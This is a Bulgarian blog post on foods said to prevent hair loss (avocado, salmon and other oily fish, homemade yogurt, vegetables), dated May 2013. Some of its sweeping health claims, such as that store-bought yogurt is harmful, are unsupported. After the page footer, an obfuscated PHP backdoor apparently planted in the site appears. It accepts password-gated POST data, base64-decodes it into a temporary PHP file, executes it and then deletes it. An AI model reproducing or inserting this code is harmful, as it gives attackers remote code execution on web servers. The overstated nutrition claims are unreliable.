Топ полезни храни при косопад | Косопад

Косопад и здравословно хранене

авокадо

Авокадото е полезно при косопад

Както много пъти сме казвали, здравословното хранене е едно от най – важните условия да имаме гъста и красива коса. Веществата, които приемаме често се оказват решаващи за поява или предпазване от косопад, а полезните храни могат да направят чудеса срещу оплешивяването.

Предлагаме ви кратък списък с някои от най – полезните срещу косопад храни, които ще заредят тялото с благотворна сила и ще му дадат възможност да се защити. Необходимо е да споменем, че за да очакваме благотворен ефект, трябва да приемаме изцяло пресни и необработвани с химикали продукти. Напълно трябва да изключим от диетата си изкуствените заместители и да ги заменим с пресни меса, плодове и зеленчуци.

Авокадо при косопад

Този екзотичен плод съдържа в себе си голяма част от необходимите за работата на мозъка съставки, спомага за стабилна сърдечна дейност и засилва кръвообращението. Това от своя страна помага за предпазване от косопад и оплешивяване, като набавя на тялото огромни количества полезни вещества. Лошото е, че в България продаваното по магазините авокадо винаги е обработено с изкуствени консерванти и в доста от случаите е замразявано.

Сьомга, скумрия, пъстърва

косопад и хранене

Океанска риба при косопад

Тези риби са изключително богати на полезните омега 3 есенциални мастни киселини и протеин, които играят съществена роля в цялостното здравословно състояние. Незаменим помощник за превенция на косопад, препоръчително е да консумираме поне два пъти в седмицата.

Кисело мляко

Истинското кисело мляко е вълшебен дар от природата, който лекува, прочиства и предпазва не само срещу косопад. Не правете грешката да купувате кисело мляко от хранителните магазини – там продават наподобяващи консистенции с неизвестен състав, които по – скоро са вредни, отколкото полезни. Отличният вариант е да си приготвяте сами у дома, като купувате прясно мляко директно от близката ферма.

Пресни зеленчуци

Чесън, спанак, карфиол, картофи, тиквички, моркови, кафяв ориз и лук – това са вълшебни природни средства срещу косопад. Всички те са богати на витамини и минерални вещества, способстващи за правилното функциониране на човешкото тяло.

Не забравяйте, че здравословното хранене е само едно от условията за крепко здраве. Заседналият начин на живот, злоупотребата с алкохолни напитки и тютюн, стресът и другите вълнения също са огромна предпоставка за поява на косопад и трябва да направите всичко възможно, за да бъдат избегнати.

03. май 2013 09:45:52 от Косопад
Категории: Любопитно за косопада | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}